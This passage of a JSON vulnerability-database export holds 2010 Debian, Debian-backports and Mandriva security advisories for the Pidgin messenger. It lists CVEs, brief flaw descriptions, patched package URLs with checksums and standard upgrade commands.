http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny6_i386.deb\n Size/MD5 checksum: 679712 d946170d5d259c120f909285c48294fb\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny6_ia64.deb\n Size/MD5 checksum: 4669414 5273183a49a9b6e334963816871d6ce0\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny6_ia64.deb\n Size/MD5 checksum: 434978 e4750a60b59c31a868dd0ebda33c96f2\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny6_ia64.deb\n Size/MD5 checksum: 948754 2b9ce7e253458ce9f7511ba26ece0b90\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny6_ia64.deb\n Size/MD5 checksum: 1789606 a2e654bacaaaef9fece43aaa2e33b420\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny6_mips.deb\n Size/MD5 checksum: 654450 edbc24d8f35a894a3d301a751d2d8977\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny6_mips.deb\n Size/MD5 checksum: 1096044 d88283ec19ea5d867e7d28325744d8fb\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny6_mips.deb\n Size/MD5 checksum: 318672 ed52e8ecafb8e410eab3194914b4014d\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny6_mips.deb\n Size/MD5 checksum: 5054324 9ddbd413029130c610512f25aa230553\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny6_mipsel.deb\n Size/MD5 checksum: 651410 89e26238fc91f1f75376d29a009cd751\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny6_mipsel.deb\n Size/MD5 checksum: 318572 4992c5f4f4bce500db6b3792295ad0c2\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny6_mipsel.deb\n Size/MD5 checksum: 4963322 2d397b0c64352a1a1e94534c0d0cf4de\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny6_mipsel.deb\n Size/MD5 checksum: 1086788 afb54d1620a692cb6273dbb9e3a67908\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny6_powerpc.deb\n Size/MD5 checksum: 5014910 acaaacb4532ae1176e628b23aaae74fe\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny6_powerpc.deb\n Size/MD5 checksum: 362722 2824883e0fb35a6b758d89188d0be39d\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny6_powerpc.deb\n Size/MD5 checksum: 755056 890358f5bc3215a5ab59609d8bd0c1d1\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny6_powerpc.deb\n Size/MD5 checksum: 1445264 d5961438dc2a8c4798e815009792fab5\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny6_s390.deb\n Size/MD5 checksum: 1326506 9a6b8060e2710587d17477c4b976922a\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny6_s390.deb\n Size/MD5 checksum: 717976 970f51fbc28082cc53af9ddc1bb183c1\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny6_s390.deb\n Size/MD5 checksum: 359214 3eca65b1913b2db015f7d5c75157e5c6\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny6_s390.deb\n Size/MD5 checksum: 4977082 e7bfcd7d662c5c41d860baabddac9c37\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny6_sparc.deb\n Size/MD5 checksum: 1302702 f550e43bfd0aa9bf89d6768eb2bf3966\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny6_sparc.deb\n Size/MD5 checksum: 329408 54fdcf6f005a936007201e8ef5a49e4c\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny6_sparc.deb\n Size/MD5 checksum: 4611594 b6124b51dd98dba2e1194295fc46002e\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny6_sparc.deb\n Size/MD5 checksum: 683284 f744d4b6e674fff37a0e00c1656db64e\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show &lt;pkg&gt;&#x27; and http://packages.debian.org/&lt;pkg&gt;\n", "edition": 1, "reporter": "Debian", "published": "2010-04-18T15:47:35", "title": "[SECURITY] [DSA 2038-1] New pidgin packages fix denial of service", "type": "debian", "enchantments": {"score": {"modified": "2018-10-16T22:14:51", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-0420", "CVE-2010-0423"], "modified": "2010-04-18T15:47:35", "id": "DEBIAN:DSA-2038-1:A8845", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2010/msg00078.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-10-16T22:14:53", "references": [], "affectedPackage": [{"OS": "Debian", "OSVersion": "5", "packageVersion": "2.4.3-4lenny8", "arch": "all", "packageFilename": "libpurple0_2.4.3-4lenny8_all.deb", "packageName": "libpurple0", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.4.3-4lenny8", "arch": "all", "packageFilename": "pidgin-dev_2.4.3-4lenny8_all.deb", "packageName": "pidgin-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.4.3-4lenny8", "arch": "all", "packageFilename": "pidgin_2.4.3-4lenny8_all.deb", "packageName": "pidgin", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.4.3-4lenny8", "arch": "all", "packageFilename": "libpurple-bin_2.4.3-4lenny8_all.deb", "packageName": "libpurple-bin", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.4.3-4lenny8", "arch": "all", "packageFilename": "finch_2.4.3-4lenny8_all.deb", "packageName": "finch", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.4.3-4lenny8", "arch": "all", "packageFilename": "finch-dev_2.4.3-4lenny8_all.deb", "packageName": "finch-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.4.3-4lenny8", "arch": "all", "packageFilename": "pidgin-data_2.4.3-4lenny8_all.deb", "packageName": "pidgin-data", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.4.3-4lenny8", "arch": "all", "packageFilename": "libpurple-dev_2.4.3-4lenny8_all.deb", "packageName": "libpurple-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.4.3-4lenny8", "arch": "all", "packageFilename": "pidgin-dbg_2.4.3-4lenny8_all.deb", "packageName": "pidgin-dbg", "operator": "lt"}], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-2038-3 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nNovember 13, 2010 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : pidgin\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2010-0420 CVE-2010-0423\nDebian Bug : 566775 579601\n\nThe packages for Pidgin released as DSA 2038-2 had a regression, as they\nunintentionally disabled the Silc, Simple, and Yahoo instant messaging\nprotocols. This update restore that functionality. For reference the\noriginal advisory text below.\n\nSeveral remote vulnerabilities have been discovered in Pidgin, a multi\nprotocol instant messaging client. The Common Vulnerabilities and\nExposures project identifies the following problems:\n\nCVE-2010-0420\n\n Crafted nicknames in the XMPP protocol can crash Pidgin remotely.\n\nCVE-2010-0423\n\n Remote contacts may send too many custom smilies, crashing Pidgin.\n\nSince a few months, Microsoft&#x27;s servers for MSN have changed the protocol,\nmaking Pidgin non-functional for use with MSN. It is not feasible to port\nthese changes to the version of Pidgin in Debian Lenny. This update\nformalises that situation by disabling the protocol in the client. Users\nof the MSN protocol are advised to use the version of Pidgin in the\nrepositories of www.backports.org.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 2.4.3-4lenny8.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.6.6-1.\n\nWe recommend that you upgrade your pidgin package.\n\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3.orig.tar.gz\n Size/MD5 checksum: 13123610 d0e0bd218fbc67df8b2eca2f21fcd427\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny8.diff.gz\n Size/MD5 checksum: 72269 0119701838d8ad1cdeac7ce4c91bae65\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny8.dsc\n Size/MD5 checksum: 1769 ad33ad23693b546e86e0912e88a4ea12\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple-dev_2.4.3-4lenny8_all.deb\n Size/MD5 checksum: 278150 84022a327404419ae540f3f3bc427e3b\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple-bin_2.4.3-4lenny8_all.deb\n Size/MD5 checksum: 133688 16372c01693c7744ff48f411aaaac5a2\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-data_2.4.3-4lenny8_all.deb\n Size/MD5 checksum: 7014900 c2c210652333d77e3573be4a8a699c9b\n http://security.debian.org/pool/updates/main/p/pidgin/finch-dev_2.4.3-4lenny8_all.deb\n Size/MD5 checksum: 159954 51bde77053b4ea6e14b1442bf1a1607d\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dev_2.4.3-4lenny8_all.deb\n Size/MD5 checksum: 194580 a7dde485b3f5d3e4893ceb2a22ee47aa\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny8_alpha.deb\n Size/MD5 checksum: 5315572 1cf0367c5e3881549bac1a4fe45aa5eb\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny8_alpha.deb\n Size/MD5 checksum: 371260 ba6898cf2c154319bffcc9cd6d4cd4a7\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny8_alpha.deb\n Size/MD5 checksum: 777478 228be5cdb1f26820e5f5348096f3c3ee\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny8_alpha.deb\n Size/MD5 checksum: 1719898 c04983751b915ceeef5a2d884edddcfd\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny8_amd64.deb\n Size/MD5 checksum: 1633712 927a05948c7ea50b4ff1515820495093\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny8_amd64.deb\n Size/MD5 checksum: 347692 4bea6a2d558defbfc9cf1bee25ec4a4d\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny8_amd64.deb\n Size/MD5 checksum: 727282 b148a28348d91d43e78b02798893bb6a\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny8_amd64.deb\n Size/MD5 checksum: 5428234 ab7cc975d13b3abd8faa2498896d8d44\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny8_arm.deb\n Size/MD5 checksum: 5118248 e2f34bded56a07650f91e119cd739c7b\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny8_arm.deb\n Size/MD5 checksum: 315658 18a22ae56dab911aa7c8667db51afbc4\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny8_arm.deb\n Size/MD5 checksum: 655810 200950fcc1f558d92e50fda7f494ea0b\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny8_arm.deb\n Size/MD5 checksum: 1422998 1e4c635bdba06539a081b1c6f422b1d2\n\narmel architecture (ARM EABI)\n\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny8_armel.deb\n Size/MD5 checksum: 1430694 4c96fa5a80593ddf0c3e4f998173bdcf\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny8_armel.deb\n Size/MD5 checksum: 667108 330bd6dcb19da7bb1ce21013f035ae32\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny8_armel.deb\n Size/MD5 checksum: 5152254 6b61008ee4337db73612d4943ed756e6\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny8_armel.deb\n Size/MD5 checksum: 319130 56c3e97232ceb5fed1688dff1c6b07f2\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny8_hppa.deb\n Size/MD5 checksum: 5249334 f9380ac4d099646026092869254f36af\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny8_hppa.deb\n Size/MD5 checksum: 360850 31898206d949ddd8a0645e756700e5e6\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny8_hppa.deb\n Size/MD5 checksum: 752928 5668adccc2caf428e04b35adad06753a\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny8_hppa.deb\n Size/MD5 checksum: 1741168 32a16b666040fd28dad3a50cb2508edd\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny8_i386.deb\n Size/MD5 checksum: 5142098 46afbb8656ef35617b90e5272ff4fb0f\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny8_i386.deb\n Size/MD5 checksum: 326492 8ffe29c959a8494c2421a0aa2f4f4d32\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny8_i386.deb\n Size/MD5 checksum: 679860 9588d20c33677a0acfffce3a98c97280\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny8_i386.deb\n Size/MD5 checksum: 1506712 e324dae1d982241abb5537b719a4831a\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny8_ia64.deb\n Size/MD5 checksum: 5000868 ae42b44a76ecb3558c5a2e5db5f19e2a\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny8_ia64.deb\n Size/MD5 checksum: 2087484 b7bc9718fd1ef427eb763a34c34b900b\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny8_ia64.deb\n Size/MD5 checksum: 435108 aa579727d0272a8fb8968bfa6e4062a7\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny8_ia64.deb\n Size/MD5 checksum: 948900 9f829afda7629eeca4f38bb043f20676\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny8_mips.deb\n Size/MD5 checksum: 1304070 c57c7afa0b340b070bc2f54f340549a3\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny8_mips.deb\n Size/MD5 checksum: 320686 c3a2186b1f6037b7fd66bdef4e47e26b\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny8_mips.deb\n Size/MD5 checksum: 656496 8b848d690917eab703a60698a3be2e1f\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny8_mips.deb\n Size/MD5 checksum: 5409338 e7fbcb9776703eb244a79fcb363adbbd\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny8_mipsel.deb\n Size/MD5 checksum: 1291760 7fb32d3297f440c73e964081860e460e\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny8_mipsel.deb\n Size/MD5 checksum: 318700 e5baa0a06a8900638e3088b9879b1923\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny8_mipsel.deb\n Size/MD5 checksum: 5306128 762422060524ce5019abe682005dd273\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny8_mipsel.deb\n Size/MD5 checksum: 651552 892ac43fc97903793d60239843524bc7\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny8_powerpc.deb\n Size/MD5 checksum: 1682748 37529f1ef367a5e984aa027c5f270d8b\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny8_powerpc.deb\n Size/MD5 checksum: 757670 9a9aef7b7215ba897e731e0dc1c2e645\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny8_powerpc.deb\n Size/MD5 checksum: 362828 f2482932f44d26f9878d1943e24fbb6a\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny8_powerpc.deb\n Size/MD5 checksum: 5360552 12cef47bcab4db9af3071cb31ce1c4f9\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny8_s390.deb\n Size/MD5 checksum: 5331892 1de914be4947ec1f1d4e9f029f350480\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny8_s390.deb\n Size/MD5 checksum: 360378 e9bb6c133cb59909e1418fae60245352\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny8_s390.deb\n Size/MD5 checksum: 719338 795beea30a9d2d289ebbd9e2ffc0f286\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny8_s390.deb\n Size/MD5 checksum: 1562530 186ca2624c320ef40cfcf309bd6bcf32\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny8_sparc.deb\n Size/MD5 checksum: 683482 7e54e2b074c6d6ad4a1fb28a070009f2\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny8_sparc.deb\n Size/MD5 checksum: 4921794 c712395d28b865aab3ede218504c7ae4\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny8_sparc.deb\n Size/MD5 checksum: 329552 591579e595077a26fc6616302723bfe7\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny8_sparc.deb\n Size/MD5 checksum: 1513948 68603d70bc41cb6f300a85ad9b0454df\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show &lt;pkg&gt;&#x27; and http://packages.debian.org/&lt;pkg&gt;\n", "edition": 1, "reporter": "Debian", "published": "2010-11-13T19:37:43", "title": "[SECURITY] [DSA 2038-3] New pidgin packages fix regression", "type": "debian", "enchantments": {"score": {"modified": "2018-10-16T22:14:53", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-0420", "CVE-2010-0423"], "modified": "2010-11-13T19:37:43", "id": "DEBIAN:DSA-2038-3:0AAAE", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2010/msg00175.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-10-16T22:14:52", "references": [], "affectedPackage": [], "description": "Jan Wagner uploaded a new package for pidgin which fixed the following\nsecurity problem:\n\nCVE-2010-1624[1]\n\n It was discovered that the msn_emoticon_msg function in slp.c in the MSN\n protocol plugin in libpurple in Pidgin before 2.7.0 allows remote attackers\n to cause a denial of service (application crash) via a custom emoticon in a\n malformed SLP message.\n\nFor the sid distribution the problem has been fixed in\nversion 2.7.0-1.\n\nUpgrade instructions\n---------------------\n\nIf you don&#x27;t use pinning (see [2]) you have to update pidgin\nmanually via &quot;apt-get -t lenny-backports install pidgin&quot;.\n\nWe recommend to pin the backports repository to 200 so that new versions\nof installed backports will be installed automatically:\n\nPackage: *\nPin: release a=lenny-backports\nPin-Priority: 200\n\n[1] http://security-tracker.debian.org/tracker/CVE-2010-1624\n[2] &lt;http://backports.org/dokuwiki/doku.php?id=instructions&gt;\n", "edition": 1, "reporter": "Debian", "published": "2010-05-19T06:49:18", "title": "[Backports-security-announce] Security Update for pidgin", "type": "debian", "enchantments": {"score": {"modified": "2018-10-16T22:14:52", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-1624"], "modified": "2010-05-19T06:49:18", "id": "DEBIAN:9B357C4F24A7CE88EED84043584C1A4B:5F8CE", "href": "https://lists.debian.org/debian-backports-announce/2010/debian-backports-announce-201005/msg00000.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-10-16T22:13:27", "references": [], "affectedPackage": [{"OS": "Debian", "OSVersion": "5", "packageVersion": "2.4.3-4lenny5", "arch": "all", "packageFilename": "pidgin_2.4.3-4lenny5_all.deb", "packageName": "pidgin", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.4.3-4lenny5", "arch": "all", "packageFilename": "finch-dev_2.4.3-4lenny5_all.deb", "packageName": "finch-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.4.3-4lenny5", "arch": "all", "packageFilename": "libpurple0_2.4.3-4lenny5_all.deb", "packageName": "libpurple0", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.4.3-4lenny5", "arch": "all", "packageFilename": "libpurple-bin_2.4.3-4lenny5_all.deb", "packageName": "libpurple-bin", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.4.3-4lenny5", "arch": "all", "packageFilename": "pidgin-data_2.4.3-4lenny5_all.deb", "packageName": "pidgin-data", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.4.3-4lenny5", "arch": "all", "packageFilename": "finch_2.4.3-4lenny5_all.deb", "packageName": "finch", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.4.3-4lenny5", "arch": "all", "packageFilename": "libpurple-dev_2.4.3-4lenny5_all.deb", "packageName": "libpurple-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.4.3-4lenny5", "arch": "all", "packageFilename": "pidgin-dev_2.4.3-4lenny5_all.deb", "packageName": "pidgin-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.4.3-4lenny5", "arch": "all", "packageFilename": "pidgin-dbg_2.4.3-4lenny5_all.deb", "packageName": "pidgin-dbg", "operator": "lt"}], "description": "Jan Wagner uploaded a new package for pidgin which fixed the following\nsecurity problem:\n\nCVE-2010-0013[1] and Debian Bug #563206[2]\n\n It was discovered that Pidgin did not properly handle custom smiley\n requests in the MSN protocol handler. A remote attacker could send a\n specially crafted filename in a custom smiley request and obtain arbitrary\n files via directory traversal.\n\nFor the lenny distribution the problem has been fixed soon in\nversion 2.4.3-4lenny5.\n\nFor the sid distribution the problem has been fixed in\nversion 2.6.5-2.\n\n\nUpgrade instructions\n---------------------\n\nIf you don&#x27;t use pinning (see [1]) you have to update nagios3\nmanually via &quot;apt-get -t etch-backports install nagios&quot;.\n[1] &lt;http://backports.org/dokuwiki/doku.php?id=instructions&gt;\n\nWe recommend to pin the backports repository to 200 so that new versions\nof installed backports will be installed automatically:\n\nPackage: *\nPin: release a=lenny-backports\nPin-Priority: 200\n\n[1] http://security-tracker.debian.org/tracker/CVE-2010-0013\n[2] http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=563206\n", "edition": 1, "reporter": "Debian", "published": "2010-01-29T07:16:12", "title": "[Backports-security-announce] Security Update for pidgin", "type": "debian", "enchantments": {"score": {"modified": "2018-10-16T22:13:27", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-0013"], "modified": "2010-01-29T07:16:12", "id": "DEBIAN:62CFE81ECCDE667CCD60DCF5E608483B:E953F", "href": "https://lists.debian.org/debian-backports-announce/2010/debian-backports-announce-201001/msg00004.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:35", "references": ["https://vulners.com/securityvulns/securityvulns:doc:23258"], "description": "Memory corruption on SLP &#40;MSN&#41; messages parsing. Multiple DoS conditions.", "edition": 1, "reporter": "BUGTRAQ", "published": "2010-02-19T00:00:00", "title": "Pidgin / Adium messenger multiple security vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:09:35", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Pidgin", "version": "2.6", "operator": "eq"}, {"name": "Adium", "version": "1.3", "operator": "eq"}], "cvelist": ["CVE-2010-0420", "CVE-2010-0423", "CVE-2010-0277"], "modified": "2010-02-19T00:00:00", "id": "SECURITYVULNS:VULN:10632", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10632", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:33", "references": [], "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2010:041\r\n http://www.mandriva.com/security/\r\n _______________________________________________________________________\r\n\r\n Package : pidgin\r\n Date : February 18, 2010\r\n Affected: 2008.0, 2009.1, 2010.0, Enterprise Server 5.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Multiple security vulnerabilities has been identified and fixed\r\n in pidgin:\r\n \r\n Certain malformed SLP messages can trigger a crash because the MSN\r\n protocol plugin fails to check that all pieces of the message are\r\n set correctly &#40;CVE-2010-0277&#41;.\r\n \r\n In a user in a multi-user chat room has a nickname containing &#39;&lt;br&gt;&#39;\r\n then libpurple ends up having two users with username &#39; &#39; in the room,\r\n and Finch crashes in this situation. We do not believe there is a\r\n possibility of remote code execution &#40;CVE-2010-0420&#41;.\r\n \r\n oCERT notified us about a problem in Pidgin, where a large amount of\r\n processing time will be used when inserting many smileys into an IM\r\n or chat window. This should not cause a crash, but Pidgin can become\r\n unusable slow &#40;CVE-2010-0423&#41;.\r\n \r\n Packages for 2008.0 are provided for Corporate Desktop 2008.0\r\n customers.\r\n \r\n This update provides pidgin 2.6.6, which is not vulnerable to these\r\n issues.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0277\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0420\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0423\r\n http://pidgin.im/news/security/\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Linux 2008.0:\r\n 7b6b149b6d3b66ac216ffdb39366d122 2008.0/i586/finch-2.6.6-0.1mdv2008.0.i586.rpm\r\n f8ef6b0bfb06eb0617fe0056b61838fc 2008.0/i586/libfinch0-2.6.6-0.1mdv2008.0.i586.rpm\r\n c9f08705a68c551450888cbd383f8e56 2008.0/i586/libpurple0-2.6.6-0.1mdv2008.0.i586.rpm\r\n fbfd67f6c3e9f70d3f6f67bbec3bb4aa 2008.0/i586/libpurple-devel-2.6.6-0.1mdv2008.0.i586.rpm\r\n 6d755e7a06ffc9448284b8c4eb740ea1 2008.0/i586/pidgin-2.6.6-0.1mdv2008.0.i586.rpm\r\n 832a2337f06dca86d03bd63700a0b6fc 2008.0/i586/pidgin-bonjour-2.6.6-0.1mdv2008.0.i586.rpm\r\n 4aae5ff624474b1a3ab1881fcaefa8a6 2008.0/i586/pidgin-client-2.6.6-0.1mdv2008.0.i586.rpm\r\n 7efd3e7f89696fee9bbe296a670e9df9 2008.0/i586/pidgin-gevolution-2.6.6-0.1mdv2008.0.i586.rpm\r\n 8f5738068a81d1ffe99d59899713d16a 2008.0/i586/pidgin-i18n-2.6.6-0.1mdv2008.0.i586.rpm\r\n 58a0e6335b9c96521f59c91a85345e01 2008.0/i586/pidgin-meanwhile-2.6.6-0.1mdv2008.0.i586.rpm\r\n 3ac4042242d37f433273ab51a1cb4c0b 